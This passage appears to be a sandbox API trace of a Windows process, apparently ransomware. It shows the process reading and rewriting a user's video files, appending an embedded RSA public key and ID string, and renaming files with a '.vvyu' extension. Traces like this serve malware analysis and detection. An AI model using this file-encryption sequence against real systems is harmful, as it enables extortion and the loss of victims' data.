[0190.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b50 [0190.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39be0 [0190.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0190.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bb0 [0190.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b98 [0190.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bf8 [0190.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b98 [0190.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0190.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b68 [0190.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0190.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.542] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30c28 | out: hHeap=0x6a0000) returned 1 [0190.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.550] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x10ffc, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x10ffc, lpOverlapped=0x0) returned 1 [0190.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.551] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11001, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.551] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0190.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0190.552] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.553] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.553] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.553] CloseHandle (hObject=0x584) returned 1 [0190.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d154b0 [0190.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.555] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\jBBJYLnJ 4z9k-.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\jbbjylnj 4z9k-.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\jBBJYLnJ 4z9k-.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\jbbjylnj 4z9k-.mkv.vvyu")) returned 1 [0190.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.557] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0190.560] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f614160, ftCreationTime.dwHighDateTime=0x1d89f2f, ftLastAccessTime.dwLowDateTime=0x4adf4130, ftLastAccessTime.dwHighDateTime=0x1d8a1d9, ftLastWriteTime.dwLowDateTime=0x4adf4130, ftLastWriteTime.dwHighDateTime=0x1d8a1d9, nFileSizeHigh=0x0, nFileSizeLow=0x6c06, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QmnC3ePw1fV.mkv", cAlternateFileName="QMNC3E~1.MKV")) returned 1 [0190.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x723d10 [0190.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.560] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\QmnC3ePw1fV.mkv") returned=".mkv" [0190.560] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\QmnC3ePw1fV.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\qmnc3epw1fv.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.562] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=27654) returned 1 [0190.562] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.564] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6be0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.564] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.566] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.567] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x6c06, lpOverlapped=0x0) returned 1 [0190.567] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.567] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.568] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.568] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea810) returned 1 [0190.569] CryptCreateHash (in: hProv=0x6ea810, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.569] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.569] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.569] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.569] GetLastError () returned 0x0 [0190.569] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.569] CryptReleaseContext (hProv=0x6ea810, dwFlags=0x0) returned 1 [0190.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.569] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.569] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.569] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6c10) returned 0x2d45778 [0190.570] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30c28 [0190.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b38 [0190.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30be0 [0190.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b50 [0190.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b80 [0190.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39be0 [0190.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b98 [0190.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.571] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bd70 [0190.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39be0 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b98 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39b80 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0190.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b98 | out: hHeap=0x6a0000) returned 1 [0190.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bd70 | out: hHeap=0x6a0000) returned 1 [0190.574] GetCurrentThreadId () returned 0x264 [0190.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44750 [0190.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea810 [0190.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.575] GetCurrentThreadId () returned 0x264 [0190.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82d20 [0190.576] RtlAllocateHeap 